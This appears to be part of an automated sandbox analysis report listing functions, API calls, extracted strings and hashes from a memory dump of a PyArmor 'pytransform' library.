                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _errno$fclosefreadstrerror
                                                                                                                                                                                                                              • String ID: Encode moudle key failed$Invalid public key %s$Open public key %s failed$Wrap result failed$Write output %s failed
                                                                                                                                                                                                                              • API String ID: 1423157237-2416068227
                                                                                                                                                                                                                              • Opcode ID: 064f02ee7a7eda49088f337caf1d49df14765bdddb5965feacabd562ac6ba8b1
                                                                                                                                                                                                                              • Instruction ID: a858fe9894e088ddeaa271bb7af763a02ae6d9e5f6ad036d76566f6719781f59
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 064f02ee7a7eda49088f337caf1d49df14765bdddb5965feacabd562ac6ba8b1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6351D162B19B4699EA01DF11FE5039E2365BB89BC4F844126EE4E1776CEF3CE685C310
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A0E6C0 Relevance: 38.6, APIs: 18, Strings: 4, Instructions: 115COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 70A048D0: fseek.MSVCRT ref: 70A04924
                                                                                                                                                                                                                                • Part of subcall function 70A048D0: malloc.MSVCRT ref: 70A0493E
                                                                                                                                                                                                                                • Part of subcall function 70A048D0: fclose.MSVCRT ref: 70A04973
                                                                                                                                                                                                                              • _errno.MSVCRT ref: 70A0E720
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _errnofclosefseekmalloc
                                                                                                                                                                                                                              • String ID: %s$%s,%d,0x%x,$pytransform.log$utils.c
                                                                                                                                                                                                                              • API String ID: 882899668-4272501623
                                                                                                                                                                                                                              • Opcode ID: ff6e9d672088651440a94f03ff6b3d6c1d2cc352164bc1e6ddb7582acea83b8f
                                                                                                                                                                                                                              • Instruction ID: 466eeb497aa6a71a22a267d73932037b1b5cd9baab3d7d230c0b180c13845270
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff6e9d672088651440a94f03ff6b3d6c1d2cc352164bc1e6ddb7582acea83b8f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E941C461719209D9EA01DB62FE507AD23A1BF98BC5F48822A9D0D573B8EF3CF545C306
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A18560 Relevance: 36.9, APIs: 9, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _strdup$fclosefprintf
                                                                                                                                                                                                                              • String ID: __armor%s__$__armor__$__armor_enter%s__$__armor_enter__$__armor_exit%s__$__armor_exit__$__armor_wrap%s__$__armor_wrap__$__pyarmor%s__$__pyarmor__$little$pytransform.log
                                                                                                                                                                                                                              • API String ID: 2840409039-221964360
                                                                                                                                                                                                                              • Opcode ID: 65da37668e56d31862f04896051962e2f4258a93e8db8c606184a7d257f4fe57
                                                                                                                                                                                                                              • Instruction ID: ec158ec088219c42bb1518a98bc122c6b6483308d046398279f5a1eb9329bfc5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65da37668e56d31862f04896051962e2f4258a93e8db8c606184a7d257f4fe57
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F151B161B18706D9EB058B61EE103AD2366BB447D8F944226DD0E577BCEB3CF685C312
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A13830 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 182stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • %s is not a legal public key, xrefs: 70A138A2
                                                                                                                                                                                                                              • Fail to write trial license file %s, xrefs: 70A13971
                                                                                                                                                                                                                              • key/iv size is %d, it must be 32., xrefs: 70A139FA
                                                                                                                                                                                                                              • %.0f, xrefs: 70A13A60
                                                                                                                                                                                                                              • Failed to encode trial license., xrefs: 70A13B50
                                                                                                                                                                                                                              • This function is not included in trial version, xrefs: 70A138FE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$_errno_time64fclosefreadmallocstrlen
                                                                                                                                                                                                                              • String ID: %.0f$%s is not a legal public key$Fail to write trial license file %s$Failed to encode trial license.$This function is not included in trial version$key/iv size is %d, it must be 32.
                                                                                                                                                                                                                              • API String ID: 710462250-180510518
                                                                                                                                                                                                                              • Opcode ID: 4922806d66ad93a31b3d40b52bd8b711158e5f963e970f96787d8c32bea80159
                                                                                                                                                                                                                              • Instruction ID: 7d99e9a89cac9958dd13412f8cdaab2a17f254e383c4e5a57ea204effa9346c8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4922806d66ad93a31b3d40b52bd8b711158e5f963e970f96787d8c32bea80159
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B61F622B15B8695EB01DF21F91139E63A4BB89BD4F844226ED4E5776CEF3CE586C300
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A100F0 Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 93stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _errno$fprintf$fclosestrerror
                                                                                                                                                                                                                              • String ID: %s$%s,%d,%s$pytransform.log
                                                                                                                                                                                                                              • API String ID: 190382524-2823618119
                                                                                                                                                                                                                              • Opcode ID: 423bcb0383107ad2cfe3caeb259c81306d49397dd44d5fc1b83df814d4625bd1
                                                                                                                                                                                                                              • Instruction ID: 3f957b21650e375c3fc512efb43a75e438ee33c57fd4610d5748b68264b46c16
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 423bcb0383107ad2cfe3caeb259c81306d49397dd44d5fc1b83df814d4625bd1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D319171705602A9EA159B22FD51F6C33A1BB89BC0F988239EE0D47369DF7CE944C305
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A36CA0 Relevance: 30.2, APIs: 16, Strings: 4, Instructions: 243COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$malloc$memcpy$memset
                                                                                                                                                                                                                              • String ID: msghash != NULL$out != NULL$outlen != NULL$src/pk/pkcs1/pkcs_1_pss_encode.c
                                                                                                                                                                                                                              • API String ID: 4204908464-4182795421
                                                                                                                                                                                                                              • Opcode ID: a5edd4bf2019379fc2d446125e25fb9e1b0630ab0c8f1c4b4422786d78230754
                                                                                                                                                                                                                              • Instruction ID: 7237829794ec719acc7ebec10954990fe64b564e2972028d7fcc0fecd61eab4a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5edd4bf2019379fc2d446125e25fb9e1b0630ab0c8f1c4b4422786d78230754
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1991BE7631868486DB50CB26E85471EF7A4F789BC4F91512AEE8A87B2CDF3DD548CB00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A21880 Relevance: 29.8, APIs: 12, Strings: 5, Instructions: 80stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: fprintf$_errno$fputc$fclosestrerror
                                                                                                                                                                                                                              • String ID: %s$%s,%d,0x%x,$(iii)$_pytransform.c$pytransform.log
                                                                                                                                                                                                                              • API String ID: 775964473-1072082768
                                                                                                                                                                                                                              • Opcode ID: d85a8e66e137e4d1a42be4bbe96423fbb0a120feba7e67d8110d770b27653edc
                                                                                                                                                                                                                              • Instruction ID: a6ce7902e68bb66497819620acc2376b85f292623bf86f80e83bf003f292ebf7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d85a8e66e137e4d1a42be4bbe96423fbb0a120feba7e67d8110d770b27653edc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF319E60B18312D5FB009B62FD107AD23A1BB88BC5F8842368D0E1B3A9DF3CF5458351
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A16D90 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 102COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _errno
                                                                                                                                                                                                                              • String ID: %s$%s,%d,0x%x,$_pytransform.c$pytransform.log
                                                                                                                                                                                                                              • API String ID: 2918714741-2792274189
                                                                                                                                                                                                                              • Opcode ID: ee9c82c75774f8b5e147858d344399ce212d601152e31dec674726e0c23dfe33
                                                                                                                                                                                                                              • Instruction ID: c6c76c5d4c5ecd6aa8720f74afe3a6b0969dcfcf6339d933bb693f9c0e1c1b64
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee9c82c75774f8b5e147858d344399ce212d601152e31dec674726e0c23dfe33
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A041A971B18746C6EB008B22F95075E67A5BB88BC4F444226EE0E477A8DF3CE546C302
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A10D70 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 85stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: fprintf$_errno$fputc$fclosefreestrerror
                                                                                                                                                                                                                              • String ID: %s$%s,%d,0x%x,$license.c$pytransform.log
                                                                                                                                                                                                                              • API String ID: 1153345444-4157288542
                                                                                                                                                                                                                              • Opcode ID: 14430c2e401770b8729fb61716c7b4df99504b8ebc2a03b19e5f7f9bd3f5d708
                                                                                                                                                                                                                              • Instruction ID: 937e2f57235d5fb3eecaa52bd306b15ab6fc487d6a0d1c33b6604d8f6521353e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14430c2e401770b8729fb61716c7b4df99504b8ebc2a03b19e5f7f9bd3f5d708
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F319C60B18306DAEA019B22EE1076D2366BF88BC5F54423ADD0E473A8EF7CF545C302
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A95D20 Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 87windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileMessageModuleName_snwprintfmalloc
                                                                                                                                                                                                                              • String ID: %ws$<unknown>$Assertion failed!Program: %wsFile: %ws, Line %uExpression: %ws$MinGW Runtime Assertion$j > 0$protect.c
                                                                                                                                                                                                                              • API String ID: 2604804178-2804858100
                                                                                                                                                                                                                              • Opcode ID: 8e1762b10520c9858c0652f410d463480c23ac0f209f7cdd4c72b362f32c1715
                                                                                                                                                                                                                              • Instruction ID: 7fe619ed10bf1f131a3c6ffd3b7a74e54ffdd722c40c3d1dddbecf883882d967
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e1762b10520c9858c0652f410d463480c23ac0f209f7cdd4c72b362f32c1715
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D21E572B28604C9EF059B25FA913AD62A5AB487C0FC44129ED0E4B3A8DF3CD741C348
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A339A0 Relevance: 22.9, APIs: 15, Instructions: 378COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
